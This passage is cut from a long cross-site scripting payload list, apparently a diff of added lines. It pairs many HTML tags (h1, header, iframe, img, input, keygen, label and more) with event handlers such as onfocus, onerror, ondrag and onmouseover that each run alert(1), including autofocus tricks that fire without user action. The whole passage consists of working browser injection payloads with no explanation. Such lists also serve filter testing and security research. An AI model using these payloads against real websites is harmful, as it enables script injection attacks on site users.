tabindex=1 onfocusin=alert(1)></h1> +<h1 onbeforecopy="alert(1)" contenteditable>test</h1> +<h1 onbeforecut="alert(1)" contenteditable>test</h1> +<h1 onbeforepaste="alert(1)" contenteditable>test</h1> +<h1 onblur=alert(1) tabindex=1 id=x></h1><input autofocus> +<h1 onclick="alert(1)">test</h1> +<h1 oncontextmenu="alert(1)">test</h1> +<h1 oncopy="alert(1)" contenteditable>test</h1> +<h1 oncut="alert(1)" contenteditable>test</h1> +<h1 ondblclick="alert(1)">test</h1> +<h1 onfocusout=alert(1) tabindex=1 id=x></h1><input autofocus> +<h1 onkeydown="alert(1)" contenteditable>test</h1> +<h1 onkeypress="alert(1)" contenteditable>test</h1> +<h1 onkeyup="alert(1)" contenteditable>test</h1> +<h1 onmousedown="alert(1)">test</h1> +<h1 onmouseenter="alert(1)">test</h1> +<h1 onmouseleave="alert(1)">test</h1> +<h1 onmousemove="alert(1)">test</h1> +<h1 onmouseout="alert(1)">test</h1> +<h1 onmouseover="alert(1)">test</h1> +<h1 onmouseup="alert(1)">test</h1> +<h1 onpaste="alert(1)" contenteditable>test</h1> +<head draggable="true" ondrag="alert(1)">test</head> +<head draggable="true" ondragend="alert(1)">test</head> +<head draggable="true" ondragenter="alert(1)">test</head> +<head draggable="true" ondragleave="alert(1)">test</head> +<head draggable="true" ondragstart="alert(1)">test</head> +<head id=x tabindex=1 onactivate=alert(1)></head> +<head id=x tabindex=1 onbeforeactivate=alert(1)></head> +<head id=x tabindex=1 onbeforedeactivate=alert(1)></head><input autofocus> +<head id=x tabindex=1 ondeactivate=alert(1)></head><input id=y autofocus> +<head id=x tabindex=1 onfocus=alert(1)></head> +<head id=x tabindex=1 onfocusin=alert(1)></head> +<head onbeforecopy="alert(1)" contenteditable>test</head> +<head onbeforecut="alert(1)" contenteditable>test</head> +<head onbeforepaste="alert(1)" contenteditable>test</head> +<head onblur=alert(1) tabindex=1 id=x></head><input autofocus> +<head onclick="alert(1)">test</head> +<head oncontextmenu="alert(1)">test</head> +<head oncopy="alert(1)" contenteditable>test</head> +<head oncut="alert(1)" contenteditable>test</head> +<head ondblclick="alert(1)">test</head> +<head onfocusout=alert(1) tabindex=1 id=x></head><input autofocus> +<head onkeydown="alert(1)" contenteditable>test</head> +<head onkeypress="alert(1)" contenteditable>test</head> +<head onkeyup="alert(1)" contenteditable>test</head> +<head onmousedown="alert(1)">test</head> +<head onmouseenter="alert(1)">test</head> +<head onmouseleave="alert(1)">test</head> +<head onmousemove="alert(1)">test</head> +<head onmouseout="alert(1)">test</head> +<head onmouseover="alert(1)">test</head> +<head onmouseup="alert(1)">test</head> +<head onpaste="alert(1)" contenteditable>test</head> +<header draggable="true" ondrag="alert(1)">test</header> +<header draggable="true" ondragend="alert(1)">test</header> +<header draggable="true" ondragenter="alert(1)">test</header> +<header draggable="true" ondragleave="alert(1)">test</header> +<header draggable="true" ondragstart="alert(1)">test</header> +<header id=x tabindex=1 onactivate=alert(1)></header> +<header id=x tabindex=1 onbeforeactivate=alert(1)></header> +<header id=x tabindex=1 onbeforedeactivate=alert(1)></header><input autofocus> +<header id=x tabindex=1 ondeactivate=alert(1)></header><input id=y autofocus> +<header id=x tabindex=1 onfocus=alert(1)></header> +<header id=x tabindex=1 onfocusin=alert(1)></header> +<header onbeforecopy="alert(1)" contenteditable>test</header> +<header onbeforecut="alert(1)" contenteditable>test</header> +<header onbeforepaste="alert(1)" contenteditable>test</header> +<header onblur=alert(1) tabindex=1 id=x></header><input autofocus> +<header onclick="alert(1)">test</header> +<header oncontextmenu="alert(1)">test</header> +<header oncopy="alert(1)" contenteditable>test</header> +<header oncut="alert(1)" contenteditable>test</header> +<header ondblclick="alert(1)">test</header> +<header onfocusout=alert(1) tabindex=1 id=x></header><input autofocus> +<header onkeydown="alert(1)" contenteditable>test</header> +<header onkeypress="alert(1)" contenteditable>test</header> +<header onkeyup="alert(1)" contenteditable>test</header> +<header onmousedown="alert(1)">test</header> +<header onmouseenter="alert(1)">test</header> +<header onmouseleave="alert(1)">test</header> +<header onmousemove="alert(1)">test</header> +<header onmouseout="alert(1)">test</header> +<header onmouseover="alert(1)">test</header> +<header onmouseup="alert(1)">test</header> +<header onpaste="alert(1)" contenteditable>test</header> +<hgroup draggable="true" ondrag="alert(1)">test</hgroup> +<hgroup draggable="true" ondragend="alert(1)">test</hgroup> +<hgroup draggable="true" ondragenter="alert(1)">test</hgroup> +<hgroup draggable="true" ondragleave="alert(1)">test</hgroup> +<hgroup draggable="true" ondragstart="alert(1)">test</hgroup> +<hgroup id=x tabindex=1 onactivate=alert(1)></hgroup> +<hgroup id=x tabindex=1 onbeforeactivate=alert(1)></hgroup> +<hgroup id=x tabindex=1 onbeforedeactivate=alert(1)></hgroup><input autofocus> +<hgroup id=x tabindex=1 ondeactivate=alert(1)></hgroup><input id=y autofocus> +<hgroup id=x tabindex=1 onfocus=alert(1)></hgroup> +<hgroup id=x tabindex=1 onfocusin=alert(1)></hgroup> +<hgroup onbeforecopy="alert(1)" contenteditable>test</hgroup> +<hgroup onbeforecut="alert(1)" contenteditable>test</hgroup> +<hgroup onbeforepaste="alert(1)" contenteditable>test</hgroup> +<hgroup onblur=alert(1) tabindex=1 id=x></hgroup><input autofocus> +<hgroup onclick="alert(1)">test</hgroup> +<hgroup oncontextmenu="alert(1)">test</hgroup> +<hgroup oncopy="alert(1)" contenteditable>test</hgroup> +<hgroup oncut="alert(1)" contenteditable>test</hgroup> +<hgroup ondblclick="alert(1)">test</hgroup> +<hgroup onfocusout=alert(1) tabindex=1 id=x></hgroup><input autofocus> +<hgroup onkeydown="alert(1)" contenteditable>test</hgroup> +<hgroup onkeypress="alert(1)" contenteditable>test</hgroup> +<hgroup onkeyup="alert(1)" contenteditable>test</hgroup> +<hgroup onmousedown="alert(1)">test</hgroup> +<hgroup onmouseenter="alert(1)">test</hgroup> +<hgroup onmouseleave="alert(1)">test</hgroup> +<hgroup onmousemove="alert(1)">test</hgroup> +<hgroup onmouseout="alert(1)">test</hgroup> +<hgroup onmouseover="alert(1)">test</hgroup> +<hgroup onmouseup="alert(1)">test</hgroup> +<hgroup onpaste="alert(1)" contenteditable>test</hgroup> +<hr draggable="true" ondrag="alert(1)">test</hr> +<hr draggable="true" ondragend="alert(1)">test</hr> +<hr draggable="true" ondragenter="alert(1)">test</hr> +<hr draggable="true" ondragleave="alert(1)">test</hr> +<hr draggable="true" ondragstart="alert(1)">test</hr> +<hr id=x tabindex=1 onactivate=alert(1)></hr> +<hr id=x tabindex=1 onbeforeactivate=alert(1)></hr> +<hr id=x tabindex=1 onbeforedeactivate=alert(1)></hr><input autofocus> +<hr id=x tabindex=1 ondeactivate=alert(1)></hr><input id=y autofocus> +<hr id=x tabindex=1 onfocus=alert(1)></hr> +<hr id=x tabindex=1 onfocusin=alert(1)></hr> +<hr onbeforecopy="alert(1)" contenteditable>test</hr> +<hr onbeforecut="alert(1)" contenteditable>test</hr> +<hr onbeforepaste="alert(1)" contenteditable>test</hr> +<hr onblur=alert(1) tabindex=1 id=x></hr><input autofocus> +<hr onclick="alert(1)">test</hr> +<hr oncontextmenu="alert(1)">test</hr> +<hr oncopy="alert(1)" contenteditable>test</hr> +<hr oncut="alert(1)" contenteditable>test</hr> +<hr ondblclick="alert(1)">test</hr> +<hr onfocusout=alert(1) tabindex=1 id=x></hr><input autofocus> +<hr onkeydown="alert(1)" contenteditable>test</hr> +<hr onkeypress="alert(1)" contenteditable>test</hr> +<hr onkeyup="alert(1)" contenteditable>test</hr> +<hr onmousedown="alert(1)">test</hr> +<hr onmouseenter="alert(1)">test</hr> +<hr onmouseleave="alert(1)">test</hr> +<hr onmousemove="alert(1)">test</hr> +<hr onmouseout="alert(1)">test</hr> +<hr onmouseover="alert(1)">test</hr> +<hr onmouseup="alert(1)">test</hr> +<hr onpaste="alert(1)" contenteditable>test</hr> +<html draggable="true" ondrag="alert(1)">test</html> +<html draggable="true" ondragend="alert(1)">test</html> +<html draggable="true" ondragenter="alert(1)">test</html> +<html draggable="true" ondragleave="alert(1)">test</html> +<html draggable="true" ondragstart="alert(1)">test</html> +<html id=x tabindex=1 onactivate=alert(1)></html> +<html id=x tabindex=1 onbeforeactivate=alert(1)></html> +<html id=x tabindex=1 onbeforedeactivate=alert(1)></html><input autofocus> +<html id=x tabindex=1 ondeactivate=alert(1)></html><input id=y autofocus> +<html id=x tabindex=1 onfocus=alert(1)></html> +<html id=x tabindex=1 onfocusin=alert(1)></html> +<html onbeforecopy="alert(1)" contenteditable>test</html> +<html onbeforecut="alert(1)" contenteditable>test</html> +<html onbeforepaste="alert(1)" contenteditable>test</html> +<html onblur=alert(1) tabindex=1 id=x></html><input autofocus> +<html onclick="alert(1)">test</html> +<html oncontextmenu="alert(1)">test</html> +<html oncopy="alert(1)" contenteditable>test</html> +<html oncut="alert(1)" contenteditable>test</html> +<html ondblclick="alert(1)">test</html> +<html onfocusout=alert(1) tabindex=1 id=x></html><input autofocus> +<html onkeydown="alert(1)" contenteditable>test</html> +<html onkeypress="alert(1)" contenteditable>test</html> +<html onkeyup="alert(1)" contenteditable>test</html> +<html onmousedown="alert(1)">test</html> +<html onmouseenter="alert(1)">test</html> +<html onmouseleave="alert(1)">test</html> +<html onmousemove="alert(1)">test</html> +<html onmouseout="alert(1)">test</html> +<html onmouseover="alert(1)">test</html> +<html onmouseup="alert(1)">test</html> +<html onpaste="alert(1)" contenteditable>test</html> +<i draggable="true" ondrag="alert(1)">test</i> +<i draggable="true" ondragend="alert(1)">test</i> +<i draggable="true" ondragenter="alert(1)">test</i> +<i draggable="true" ondragleave="alert(1)">test</i> +<i draggable="true" ondragstart="alert(1)">test</i> +<i id=x tabindex=1 onactivate=alert(1)></i> +<i id=x tabindex=1 onbeforeactivate=alert(1)></i> +<i id=x tabindex=1 onbeforedeactivate=alert(1)></i><input autofocus> +<i id=x tabindex=1 ondeactivate=alert(1)></i><input id=y autofocus> +<i id=x tabindex=1 onfocus=alert(1)></i> +<i id=x tabindex=1 onfocusin=alert(1)></i> +<i onbeforecopy="alert(1)" contenteditable>test</i> +<i onbeforecut="alert(1)" contenteditable>test</i> +<i onbeforepaste="alert(1)" contenteditable>test</i> +<i onblur=alert(1) tabindex=1 id=x></i><input autofocus> +<i onclick="alert(1)">test</i> +<i oncontextmenu="alert(1)">test</i> +<i oncopy="alert(1)" contenteditable>test</i> +<i oncut="alert(1)" contenteditable>test</i> +<i ondblclick="alert(1)">test</i> +<i onfocusout=alert(1) tabindex=1 id=x></i><input autofocus> +<i onkeydown="alert(1)" contenteditable>test</i> +<i onkeypress="alert(1)" contenteditable>test</i> +<i onkeyup="alert(1)" contenteditable>test</i> +<i onmousedown="alert(1)">test</i> +<i onmouseenter="alert(1)">test</i> +<i onmouseleave="alert(1)">test</i> +<i onmousemove="alert(1)">test</i> +<i onmouseout="alert(1)">test</i> +<i onmouseover="alert(1)">test</i> +<i onmouseup="alert(1)">test</i> +<i onpaste="alert(1)" contenteditable>test</i> +<iframe draggable="true" ondrag="alert(1)">test</iframe> +<iframe draggable="true" ondragend="alert(1)">test</iframe> +<iframe draggable="true" ondragenter="alert(1)">test</iframe> +<iframe draggable="true" ondragleave="alert(1)">test</iframe> +<iframe draggable="true" ondragstart="alert(1)">test</iframe> +<iframe id=x onfocus=alert(1)> +<iframe id=x onfocusin=alert(1)> +<iframe id=x tabindex=1 onactivate=alert(1)></iframe> +<iframe id=x tabindex=1 onbeforeactivate=alert(1)></iframe> +<iframe id=x tabindex=1 onbeforedeactivate=alert(1)></iframe><input autofocus> +<iframe id=x tabindex=1 ondeactivate=alert(1)></iframe><input id=y autofocus> +<iframe onbeforecopy="alert(1)" contenteditable>test</iframe> +<iframe onbeforecut="alert(1)" contenteditable>test</iframe> +<iframe onbeforepaste="alert(1)" contenteditable>test</iframe> +<iframe onblur=alert(1) id=x><input autofocus> +<iframe onclick="alert(1)">test</iframe> +<iframe oncontextmenu="alert(1)">test</iframe> +<iframe oncopy="alert(1)" contenteditable>test</iframe> +<iframe oncut="alert(1)" contenteditable>test</iframe> +<iframe ondblclick="alert(1)">test</iframe> +<iframe onfocusout=alert(1) id=x><input autofocus> +<iframe onkeydown="alert(1)" contenteditable>test</iframe> +<iframe onkeypress="alert(1)" contenteditable>test</iframe> +<iframe onkeyup="alert(1)" contenteditable>test</iframe> +<iframe onload=alert(1)></iframe> +<iframe onmousedown="alert(1)">test</iframe> +<iframe onmouseenter="alert(1)">test</iframe> +<iframe onmouseleave="alert(1)">test</iframe> +<iframe onmousemove="alert(1)">test</iframe> +<iframe onmouseout="alert(1)">test</iframe> +<iframe onmouseover="alert(1)">test</iframe> +<iframe onmouseup="alert(1)">test</iframe> +<iframe onpaste="alert(1)" contenteditable>test</iframe> +<iframe onreadystatechange=alert(1)></iframe> +<image draggable="true" ondrag="alert(1)">test</image> +<image draggable="true" ondragend="alert(1)">test</image> +<image draggable="true" ondragenter="alert(1)">test</image> +<image draggable="true" ondragleave="alert(1)">test</image> +<image draggable="true" ondragstart="alert(1)">test</image> +<image id=x tabindex=1 onactivate=alert(1)></image> +<image id=x tabindex=1 onbeforeactivate=alert(1)></image> +<image id=x tabindex=1 onbeforedeactivate=alert(1)></image><input autofocus> +<image id=x tabindex=1 ondeactivate=alert(1)></image><input id=y autofocus> +<image id=x tabindex=1 onfocus=alert(1)></image> +<image id=x tabindex=1 onfocusin=alert(1)></image> +<image onbeforecopy="alert(1)" contenteditable>test</image> +<image onbeforecut="alert(1)" contenteditable>test</image> +<image onbeforepaste="alert(1)" contenteditable>test</image> +<image onblur=alert(1) tabindex=1 id=x></image><input autofocus> +<image onclick="alert(1)">test</image> +<image oncontextmenu="alert(1)">test</image> +<image oncopy="alert(1)" contenteditable>test</image> +<image oncut="alert(1)" contenteditable>test</image> +<image ondblclick="alert(1)">test</image> +<image onfocusout=alert(1) tabindex=1 id=x></image><input autofocus> +<image onkeydown="alert(1)" contenteditable>test</image> +<image onkeypress="alert(1)" contenteditable>test</image> +<image onkeyup="alert(1)" contenteditable>test</image> +<image onmousedown="alert(1)">test</image> +<image onmouseenter="alert(1)">test</image> +<image onmouseleave="alert(1)">test</image> +<image onmousemove="alert(1)">test</image> +<image onmouseout="alert(1)">test</image> +<image onmouseover="alert(1)">test</image> +<image onmouseup="alert(1)">test</image> +<image onpaste="alert(1)" contenteditable>test</image> +<image src/onerror=alert(1)> +<image src=validimage.png onload=alert(1)> +<image src=validimage.png onloadend=alert(1)> +<image src=validimage.png onloadstart=alert(1)> +<image srcset=1 onerror=alert(1)> +<img draggable="true" ondrag="alert(1)">test</img> +<img draggable="true" ondragend="alert(1)">test</img> +<img draggable="true" ondragenter="alert(1)">test</img> +<img draggable="true" ondragleave="alert(1)">test</img> +<img draggable="true" ondragstart="alert(1)">test</img> +<img id=x tabindex=1 onactivate=alert(1)></img> +<img id=x tabindex=1 onbeforeactivate=alert(1)></img> +<img id=x tabindex=1 onbeforedeactivate=alert(1)></img><input autofocus> +<img id=x tabindex=1 ondeactivate=alert(1)></img><input id=y autofocus> +<img id=x tabindex=1 onfocus=alert(1)></img> +<img id=x tabindex=1 onfocusin=alert(1)></img> +<img onbeforecopy="alert(1)" contenteditable>test</img> +<img onbeforecut="alert(1)" contenteditable>test</img> +<img onbeforepaste="alert(1)" contenteditable>test</img> +<img onblur=alert(1) tabindex=1 id=x></img><input autofocus> +<img onclick="alert(1)">test</img> +<img oncontextmenu="alert(1)">test</img> +<img oncopy="alert(1)" contenteditable>test</img> +<img oncut="alert(1)" contenteditable>test</img> +<img ondblclick="alert(1)">test</img> +<img onfocusout=alert(1) tabindex=1 id=x></img><input autofocus> +<img onkeydown="alert(1)" contenteditable>test</img> +<img onkeypress="alert(1)" contenteditable>test</img> +<img onkeyup="alert(1)" contenteditable>test</img> +<img onmousedown="alert(1)">test</img> +<img onmouseenter="alert(1)">test</img> +<img onmouseleave="alert(1)">test</img> +<img onmousemove="alert(1)">test</img> +<img onmouseout="alert(1)">test</img> +<img onmouseover="alert(1)">test</img> +<img onmouseup="alert(1)">test</img> +<img onpaste="alert(1)" contenteditable>test</img> +<img src/onerror=alert(1)> +<img src=validimage.png onload=alert(1)> +<img src=validimage.png onloadend=alert(1)> +<img src=validimage.png onloadstart=alert(1)> +<img srcset=1 onerror=alert(1)> +<img srcset=validimage.png onload=alert(1)> +<img usemap=#x><map name="x"><area href onfocus=alert(1) id=x> +<img usemap=#x><map name="x"><area href onfocusin=alert(1) id=x> +<input autofocus onfocus=alert(1)> +<input autofocus onfocusin=alert(1)> +<input draggable="true" ondrag="alert(1)">test</input> +<input draggable="true" ondragend="alert(1)">test</input> +<input draggable="true" ondragenter="alert(1)">test</input> +<input draggable="true" ondragleave="alert(1)">test</input> +<input draggable="true" ondragstart="alert(1)">test</input> +<input id=x onfocus=alert(1)> +<input id=x onfocusin=alert(1)> +<input id=x tabindex=1 onactivate=alert(1)></input> +<input id=x tabindex=1 onbeforeactivate=alert(1)></input> +<input id=x tabindex=1 onbeforedeactivate=alert(1)></input><input autofocus> +<input id=x tabindex=1 ondeactivate=alert(1)></input><input id=y autofocus> +<input onauxclick=alert(1)> +<input onbeforecopy=alert(1) value="XSS" autofocus> +<input onbeforecut=alert(1) value="XSS" autofocus> +<input onbeforepaste=alert(1) value="" autofocus> +<input onblur=alert(1) id=x><input autofocus> +<input onchange=alert(1) value=xss> +<input onclick="alert(1)">test</input> +<input oncontextmenu="alert(1)">test</input> +<input oncopy=alert(1) value="XSS" autofocus> +<input oncut=alert(1) value="XSS" autofocus> +<input ondblclick="alert(1)">test</input> +<input onfocusout=alert(1) id=x><input autofocus> +<input oninput=alert(1) value=xss> +<input onkeydown="alert(1)" contenteditable>test</input> +<input onkeypress="alert(1)" contenteditable>test</input> +<input onkeyup="alert(1)" contenteditable>test</input> +<input onmousedown="alert(1)">test</input> +<input onmouseenter="alert(1)">test</input> +<input onmouseleave="alert(1)">test</input> +<input onmousemove="alert(1)">test</input> +<input onmouseout="alert(1)">test</input> +<input onmouseover="alert(1)">test</input> +<input onmouseup="alert(1)">test</input> +<input onpaste=alert(1) value="" autofocus> +<input onselect=alert(1) value="XSS" autofocus> +<input type=checkbox id=x onfocus=alert(1)> +<input type=checkbox id=x onfocusin=alert(1)> +<input type=image onloadend=alert(1) src=validimage.png> +<input type=image onloadstart=alert(1) src=validimage.png> +<input type=image src=1 onerror=alert(1)> +<input type=image src=validimage.png onload=alert(1)> +<input type=radio id=x onfocus=alert(1)> +<input type=radio id=x onfocusin=alert(1)> +<ins draggable="true" ondrag="alert(1)">test</ins> +<ins draggable="true" ondragend="alert(1)">test</ins> +<ins draggable="true" ondragenter="alert(1)">test</ins> +<ins draggable="true" ondragleave="alert(1)">test</ins> +<ins draggable="true" ondragstart="alert(1)">test</ins> +<ins id=x tabindex=1 onactivate=alert(1)></ins> +<ins id=x tabindex=1 onbeforeactivate=alert(1)></ins> +<ins id=x tabindex=1 onbeforedeactivate=alert(1)></ins><input autofocus> +<ins id=x tabindex=1 ondeactivate=alert(1)></ins><input id=y autofocus> +<ins id=x tabindex=1 onfocus=alert(1)></ins> +<ins id=x tabindex=1 onfocusin=alert(1)></ins> +<ins onbeforecopy="alert(1)" contenteditable>test</ins> +<ins onbeforecut="alert(1)" contenteditable>test</ins> +<ins onbeforepaste="alert(1)" contenteditable>test</ins> +<ins onblur=alert(1) tabindex=1 id=x></ins><input autofocus> +<ins onclick="alert(1)">test</ins> +<ins oncontextmenu="alert(1)">test</ins> +<ins oncopy="alert(1)" contenteditable>test</ins> +<ins oncut="alert(1)" contenteditable>test</ins> +<ins ondblclick="alert(1)">test</ins> +<ins onfocusout=alert(1) tabindex=1 id=x></ins><input autofocus> +<ins onkeydown="alert(1)" contenteditable>test</ins> +<ins onkeypress="alert(1)" contenteditable>test</ins> +<ins onkeyup="alert(1)" contenteditable>test</ins> +<ins onmousedown="alert(1)">test</ins> +<ins onmouseenter="alert(1)">test</ins> +<ins onmouseleave="alert(1)">test</ins> +<ins onmousemove="alert(1)">test</ins> +<ins onmouseout="alert(1)">test</ins> +<ins onmouseover="alert(1)">test</ins> +<ins onmouseup="alert(1)">test</ins> +<ins onpaste="alert(1)" contenteditable>test</ins> +<isindex draggable="true" ondrag="alert(1)">test</isindex> +<isindex draggable="true" ondragend="alert(1)">test</isindex> +<isindex draggable="true" ondragenter="alert(1)">test</isindex> +<isindex draggable="true" ondragleave="alert(1)">test</isindex> +<isindex draggable="true" ondragstart="alert(1)">test</isindex> +<isindex id=x tabindex=1 onactivate=alert(1)></isindex> +<isindex id=x tabindex=1 onbeforeactivate=alert(1)></isindex> +<isindex id=x tabindex=1 onbeforedeactivate=alert(1)></isindex><input autofocus> +<isindex id=x tabindex=1 ondeactivate=alert(1)></isindex><input id=y autofocus> +<isindex id=x tabindex=1 onfocus=alert(1)></isindex> +<isindex id=x tabindex=1 onfocusin=alert(1)></isindex> +<isindex onbeforecopy="alert(1)" contenteditable>test</isindex> +<isindex onbeforecut="alert(1)" contenteditable>test</isindex> +<isindex onbeforepaste="alert(1)" contenteditable>test</isindex> +<isindex onblur=alert(1) tabindex=1 id=x></isindex><input autofocus> +<isindex onclick="alert(1)">test</isindex> +<isindex oncontextmenu="alert(1)">test</isindex> +<isindex oncopy="alert(1)" contenteditable>test</isindex> +<isindex oncut="alert(1)" contenteditable>test</isindex> +<isindex ondblclick="alert(1)">test</isindex> +<isindex onfocusout=alert(1) tabindex=1 id=x></isindex><input autofocus> +<isindex onkeydown="alert(1)" contenteditable>test</isindex> +<isindex onkeypress="alert(1)" contenteditable>test</isindex> +<isindex onkeyup="alert(1)" contenteditable>test</isindex> +<isindex onmousedown="alert(1)">test</isindex> +<isindex onmouseenter="alert(1)">test</isindex> +<isindex onmouseleave="alert(1)">test</isindex> +<isindex onmousemove="alert(1)">test</isindex> +<isindex onmouseout="alert(1)">test</isindex> +<isindex onmouseover="alert(1)">test</isindex> +<isindex onmouseup="alert(1)">test</isindex> +<isindex onpaste="alert(1)" contenteditable>test</isindex> +<isindex type=image onload=alert(1) src=validimage.png> +<isindex type=image src=1 onerror=alert(1)> +<kbd draggable="true" ondrag="alert(1)">test</kbd> +<kbd draggable="true" ondragend="alert(1)">test</kbd> +<kbd draggable="true" ondragenter="alert(1)">test</kbd> +<kbd draggable="true" ondragleave="alert(1)">test</kbd> +<kbd draggable="true" ondragstart="alert(1)">test</kbd> +<kbd id=x tabindex=1 onactivate=alert(1)></kbd> +<kbd id=x tabindex=1 onbeforeactivate=alert(1)></kbd> +<kbd id=x tabindex=1 onbeforedeactivate=alert(1)></kbd><input autofocus> +<kbd id=x tabindex=1 ondeactivate=alert(1)></kbd><input id=y autofocus> +<kbd id=x tabindex=1 onfocus=alert(1)></kbd> +<kbd id=x tabindex=1 onfocusin=alert(1)></kbd> +<kbd onbeforecopy="alert(1)" contenteditable>test</kbd> +<kbd onbeforecut="alert(1)" contenteditable>test</kbd> +<kbd onbeforepaste="alert(1)" contenteditable>test</kbd> +<kbd onblur=alert(1) tabindex=1 id=x></kbd><input autofocus> +<kbd onclick="alert(1)">test</kbd> +<kbd oncontextmenu="alert(1)">test</kbd> +<kbd oncopy="alert(1)" contenteditable>test</kbd> +<kbd oncut="alert(1)" contenteditable>test</kbd> +<kbd ondblclick="alert(1)">test</kbd> +<kbd onfocusout=alert(1) tabindex=1 id=x></kbd><input autofocus> +<kbd onkeydown="alert(1)" contenteditable>test</kbd> +<kbd onkeypress="alert(1)" contenteditable>test</kbd> +<kbd onkeyup="alert(1)" contenteditable>test</kbd> +<kbd onmousedown="alert(1)">test</kbd> +<kbd onmouseenter="alert(1)">test</kbd> +<kbd onmouseleave="alert(1)">test</kbd> +<kbd onmousemove="alert(1)">test</kbd> +<kbd onmouseout="alert(1)">test</kbd> +<kbd onmouseover="alert(1)">test</kbd> +<kbd onmouseup="alert(1)">test</kbd> +<kbd onpaste="alert(1)" contenteditable>test</kbd> +<keygen autofocus onfocus=alert(1)> +<keygen autofocus onfocusin=alert(1)> +<keygen draggable="true" ondrag="alert(1)">test</keygen> +<keygen draggable="true" ondragend="alert(1)">test</keygen> +<keygen draggable="true" ondragenter="alert(1)">test</keygen> +<keygen draggable="true" ondragleave="alert(1)">test</keygen> +<keygen draggable="true" ondragstart="alert(1)">test</keygen> +<keygen id=x onfocus=alert(1)> +<keygen id=x onfocusin=alert(1)> +<keygen id=x tabindex=1 onactivate=alert(1)></keygen> +<keygen id=x tabindex=1 onbeforeactivate=alert(1)></keygen> +<keygen id=x tabindex=1 onbeforedeactivate=alert(1)></keygen><input autofocus> +<keygen id=x tabindex=1 ondeactivate=alert(1)></keygen><input id=y autofocus> +<keygen onbeforecopy="alert(1)" contenteditable>test</keygen> +<keygen onbeforecut="alert(1)" contenteditable>test</keygen> +<keygen onbeforepaste="alert(1)" contenteditable>test</keygen> +<keygen onblur=alert(1) tabindex=1 id=x></keygen><input autofocus> +<keygen onclick="alert(1)">test</keygen> +<keygen oncontextmenu="alert(1)">test</keygen> +<keygen oncopy="alert(1)" contenteditable>test</keygen> +<keygen oncut="alert(1)" contenteditable>test</keygen> +<keygen ondblclick="alert(1)">test</keygen> +<keygen onfocusout=alert(1) tabindex=1 id=x></keygen><input autofocus> +<keygen onkeydown="alert(1)" contenteditable>test</keygen> +<keygen onkeypress="alert(1)" contenteditable>test</keygen> +<keygen onkeyup="alert(1)" contenteditable>test</keygen> +<keygen onmousedown="alert(1)">test</keygen> +<keygen onmouseenter="alert(1)">test</keygen> +<keygen onmouseleave="alert(1)">test</keygen> +<keygen onmousemove="alert(1)">test</keygen> +<keygen onmouseout="alert(1)">test</keygen> +<keygen onmouseover="alert(1)">test</keygen> +<keygen onmouseup="alert(1)">test</keygen> +<keygen onpaste="alert(1)" contenteditable>test</keygen> +<label draggable="true" ondrag="alert(1)">test</label> +<label draggable="true" ondragend="alert(1)">test</label> +<label draggable="true" ondragenter="alert(1)">test</label> +<label draggable="true" ondragleave="alert(1)">test</label> +<label draggable="true" ondragstart="alert(1)">test</label> +<label id=x tabindex=1 onactivate=alert(1)></label> +<label id=x tabindex=1 onbeforeactivate=alert(1)></label> +<label id=x tabindex=1 onbeforedeactivate=alert(1)></label><input autofocus> +<label id=x tabindex=1 ondeactivate=alert(1)></label><input id=y autofocus> +<label id=x tabindex=1 onfocus=alert(1)></label> +<label id=x tabindex=1 onfocusin=alert(1)></label> +<label onbeforecopy="alert(1)" contenteditable>test</label> +<label onbeforecut="alert(1)" contenteditable>test</label> +<label onbeforepaste="alert(1)" contenteditable>test</label> +<label onblur=alert(1) tabindex=1 id=x></label><input autofocus> +<label onclick="alert(1)">test</label> +<label oncontextmenu="alert(1)">test</label> +<label oncopy="alert(1)" contenteditable>test</label> +<label oncut="alert(1)" contenteditable>test</label> +<label ondblclick="alert(1)">test</label> +<label onfocusout=alert(1) tabindex=1 id=x></label><input autofocus> +<label onkeydown="alert(1)" contenteditable>test</label> +<label onkeypress="alert(1)" contenteditable>test</label> +<label onkeyup="alert(1)" contenteditable>test</label> +<label onmousedown="alert(1)">test</label> +<label onmouseenter="alert(1)">test</label> +<label onmouseleave="alert(1)">test</label> +<label onmousemove="alert(1)">test</label> +<label onmouseout="alert(1)">test</label> +<label onmouseover="alert(1)">test</label> +<label onmouseup="alert(1)">test</label> +<label onpaste="alert(1)" contenteditable>test</label> +<legend draggable="true" ondrag="alert(1)">test</legend> +<legend draggable="true" ondragend="alert(1)">test</legend> +<legend draggable="true" ondragenter="alert(1)">test</legend> +<legend draggable="true" ondragleave="alert(1)">test</legend> +<legend draggable="true" ondragstart="alert(1)">test</legend> +<legend id=x tabindex=1 onactivate=alert(1)></legend> +<legend id=x tabindex=1 onbeforeactivate=alert(1)></legend> +<legend id=x tabindex=1 onbeforedeactivate=alert(1)></legend><input autofocus> +<legend id=x tabindex=1 ondeactivate=alert(1)></legend><input id=y autofocus> +<legend id=x tabindex=1 onfocus=alert(1)></legend> +<legend id=x tabindex=1 onfocusin=alert(1)></legend> +<legend onbeforecopy="alert(1)" contenteditable>test</legend> +<legend onbeforecut="alert(1)" contenteditable>test</legend> +<legend onbeforepaste="alert(1)" contenteditable>test</legend> +<legend onblur=alert(1) tabindex=1 id=x></legend><input autofocus> +<legend onclick="alert(1)">test</legend> +<legend oncontextmenu="alert(1)">test</legend> +<legend oncopy="alert(1)" contenteditable>test</legend> +<legend oncut="alert(1)" contenteditable>test</legend> +<legend ondblclick="alert(1)">test</legend> +<legend onfocusout=alert(1) tabindex=1 id=x></legend><input autofocus> +<legend onkeydown="alert(1)" contenteditable>test</legend> +<legend onkeypress="alert(1)" contenteditable>test</legend> +<legend onkeyup="alert(1)" contenteditable>test</legend> +<legend onmousedown="alert(1)">test</legend> +<legend onmouseenter="alert(1)">test</legend> +<legend onmouseleave="alert(1)">test</legend> +<legend onmousemove="alert(1)">test</legend> +<legend onmouseout="alert(1)">test</legend> +<legend onmouseover="alert(1)">test</legend> +<legend onmouseup="alert(1)">test</legend> +<legend onpaste="alert(1)" contenteditable>test</legend> +<li draggable="true" ondrag="alert(1)">test</li> +<li draggable="true" ondragend="alert(1)">test</li> +<li draggable="true" ondragenter="alert(1)">test</li> +<li draggable="true" ondragleave="alert(1)">test</li> +<li draggable="true" ondragstart="alert(1)">test</li> +<li id=x tabindex=1 onactivate=alert(1)></li> +<li id=x tabindex=1 onbeforeactivate=alert(1)></li> +<li id=x tabindex=1 onbeforedeactivate=alert(1)></li><input autofocus> +<li id=x tabindex=1 ondeactivate=alert(1)></li><input id=y autofocus> +<li id=x tabindex=1 onfocus=alert(1)></li> +<li id=x tabindex=1 onfocusin=alert(1)></li> +<li onbeforecopy="alert(1)" contenteditable>test</li> +<li 